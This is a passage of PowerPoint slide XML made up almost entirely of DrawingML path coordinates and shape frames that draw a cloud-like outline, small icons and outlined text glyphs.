                  <a:lnTo>
                    <a:pt x="116611" y="1536298"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176928" y="1580537"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209096" y="1604668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245286" y="1616733"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="281476" y="1632820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="321687" y="1640863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="361898" y="1644885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="406130" y="1648907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430256" y="1648907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="458404" y="1644885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="458404" y="1681080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462425" y="1705211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462425" y="1729341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="470467" y="1753471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="474488" y="1773580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="490573" y="1821841"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="502636" y="1841949"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="514699" y="1866080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="575016" y="1946514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="631311" y="1998797"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="671522" y="2030970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="715754" y="2059123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="764007" y="2083253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="816281" y="2103361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="868556" y="2119448"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="924851" y="2131514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="957020" y="2135535"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="985167" y="2139557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1013315" y="2139557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1045484" y="2143579"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1077652" y="2139557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1109821" y="2139557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1174159" y="2131514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1206327" y="2123470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1262623" y="2107383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1294791" y="2099340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1318918" y="2087275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1347066" y="2071188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1371192" y="2059123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1395319" y="2043036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1423466" y="2026949"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1443572" y="2010862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1467698" y="1994775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1487804" y="1974666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1503888" y="1994775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1523994" y="2018905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1544099" y="2034992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1568226" y="2055101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1592352" y="2071188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1616479" y="2091296"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1644627" y="2103361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1676795" y="2119448"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1708964" y="2131514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1741133" y="2139557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1777323" y="2151622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1849702" y="2167709"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1885892" y="2171731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1922082" y="2171731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1962293" y="2175753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2014567" y="2171731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2062820" y="2167709"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2111073" y="2159666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2159326" y="2147600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2199537" y="2135535"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2243769" y="2119448"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2279959" y="2103361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2320170" y="2083253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2380487" y="2034992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2408634" y="2010862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2452866" y="1954558"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2476993" y="1894232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2485035" y="1862058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2505140" y="1866080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2521225" y="1870101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2589583" y="1870101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2613710" y="1866080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2641858" y="1862058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2665984" y="1854015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2690111" y="1841949"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2730322" y="1817819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2746406" y="1797710"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2766511" y="1781624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2782596" y="1765537"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2794659" y="1745428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2802701" y="1721298"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2814765" y="1701189"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2822807" y="1677059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2826828" y="1652928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2826828" y="1628798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2822807" y="1596624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2818786" y="1568472"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2846933" y="1572494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2879102" y="1576516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2907250" y="1580537"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2939418" y="1580537"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3027883" y="1572494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3072115" y="1560429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3112325" y="1548363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3152536" y="1532277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3188726" y="1512168"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3253064" y="1463907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3309359" y="1407603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3329465" y="1371408"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3349570" y="1339234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3365654" y="1303038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3381739" y="1222604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3385760" y="1182387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3381739" y="1142169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3373697" y="1101952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3349570" y="1029561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3329465" y="993365"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3281211" y="929018"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3253064" y="900866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3220895" y="876735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3188726" y="856627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3152536" y="832496"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3112325" y="816410"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3072115" y="804344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3027883" y="792279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2939418" y="784236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2911271" y="788258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2883123" y="788258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2854976" y="792279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2826828" y="800323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2826828" y="695758"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2822807" y="663584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2818786" y="635432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2810744" y="607280"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2802701" y="583150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2794659" y="554997"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2770533" y="498693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2746406" y="450433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2730322" y="426302"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2714237" y="406194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2698153" y="382063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2678047" y="361955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2661963" y="341846"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2641858" y="321737"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2621752" y="305651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2601647" y="285542"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2553394" y="253368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2481014" y="217173"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2428740" y="197064"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2372444" y="180977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2288001" y="168912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2259854" y="168912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2207580" y="172934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2159326" y="176955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2111073" y="193042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2062820" y="205107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1974356" y="245325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1938166" y="273477"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1897955" y="301629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1857744" y="237281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1833618" y="209129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1809491" y="176955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1753196" y="128695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1721027" y="104564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1684837" y="80434"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1648648" y="64347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1616479" y="48260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1576268" y="32173"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1540078" y="20108"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1499867" y="8043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1419445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5663CAF6-844E-1788-7710-CEC7F3088C3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480" y="2347164"/>
              <a:ext cx="3188726" cy="1998797"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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EAA78DD7-DA4E-76E7-6EB1-FFAF6BFF4C0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932" y="2272356"/>
              <a:ext cx="3434120" cy="2222500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350987CE-81DC-13EE-D773-20EAFD6A979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5232" y="2819638"/>
              <a:ext cx="650987" cy="957580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71F3B0A5-C366-9246-8BF1-8A3C62C467F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6405" y="3394443"/>
              <a:ext cx="372321" cy="372110"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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4679C1A8-23D6-CCE2-31D4-6009C1EC3B7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1248" y="3888236"/>
              <a:ext cx="984181" cy="94487"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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CDCAE915-6160-C1F9-A46E-11A2722B851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72802" y="3103367"/>
              <a:ext cx="414022" cy="612559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743E26A2-050B-CFD9-8711-BD9FBF7DDD8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0737" y="3134320"/>
              <a:ext cx="353019" cy="561923"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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A5E5FE6B-2A1D-A1AB-F707-949EC9B5C2AD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4175391" y="3096538"/>
              <a:ext cx="431165" cy="618490"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="370151" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="64505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="591119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61924" y="618015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143882" y="603327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65793" y="603327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61511" y="602826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63726" y="602429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26322" y="586183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="586183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10446" y="579287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="579287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="78228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8757" y="78228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="70836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51162" y="70836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="368774" y="15469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="366940" y="14804"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410973" y="14804"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370151" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="63726" y="602429"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="61511" y="602826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65793" y="603327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63726" y="602429"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="415845" y="539324"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="63726" y="602429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65793" y="603327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143882" y="603327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430803" y="551906"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430803" y="545616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415845" y="545616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415845" y="539324"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="10446" y="579287"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="14958" y="586183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="581247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10446" y="579287"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="14958" y="581247"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="14958" y="586183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26322" y="586183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="581247"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="14958" y="579287"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="10446" y="579287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="581247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="579287"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="422007" y="538220"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="415845" y="539324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415845" y="545616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="422007" y="538220"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="430803" y="538220"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="422007" y="538220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415845" y="545616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430803" y="545616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430803" y="538220"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="415845" y="32542"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="415845" y="539324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="422007" y="538220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430803" y="538220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430803" y="34336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="420791" y="34336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415845" y="32542"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="14958" y="70836"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8757" y="78228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="77147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="70836"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="14958" y="77147"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8757" y="78228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="78228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="77147"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="51162" y="70836"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="14958" y="70836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="77147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51162" y="70836"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="415845" y="27264"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="415845" y="32542"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="420791" y="34336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415845" y="27264"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="430803" y="27264"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="415845" y="27264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="420791" y="34336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430803" y="34336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430803" y="27264"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="410973" y="14804"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="366940" y="14804"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370750" y="15124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="368774" y="15469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415845" y="32542"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415845" y="27264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430803" y="27264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430803" y="21996"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410973" y="14804"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="366940" y="14804"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="368774" y="15469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370750" y="15124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="366940" y="14804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5F0B5752-DBC1-CFFF-F1C3-7909BEBAA19C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4108729" y="3689588"/>
              <a:ext cx="573405" cy="155575"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="573404" h="155575">
                  <a:moveTo>
                    <a:pt x="573028" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="155447"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="573028" y="155447"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="573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6C1BC56A-60E3-A1A4-78BA-075BC06F833F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4120230" y="3720109"/>
              <a:ext cx="551180" cy="96520"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="64760" y="4084"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="4084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23185" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23185" y="55839"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61732" y="55839"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61732" y="38364"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23185" y="38364"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23185" y="21559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64760" y="21559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64760" y="4084"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="103957" y="26293"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="82052" y="26293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82052" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103957" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103957" y="26293"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="104567" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="81443" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81443" y="16581"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104567" y="16581"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104567" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="147727" y="26293"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="125822" y="26293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125822" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147727" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147727" y="48808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150470" y="47833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153031" y="47142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157786" y="46329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175220" y="46329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175220" y="36291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147727" y="36291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147727" y="26293"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="175220" y="46329"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="168273" y="46329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170851" y="46532"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172355" y="46776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173384" y="47142"/>
                  </a:lnTo>
                  <a:lnTo>
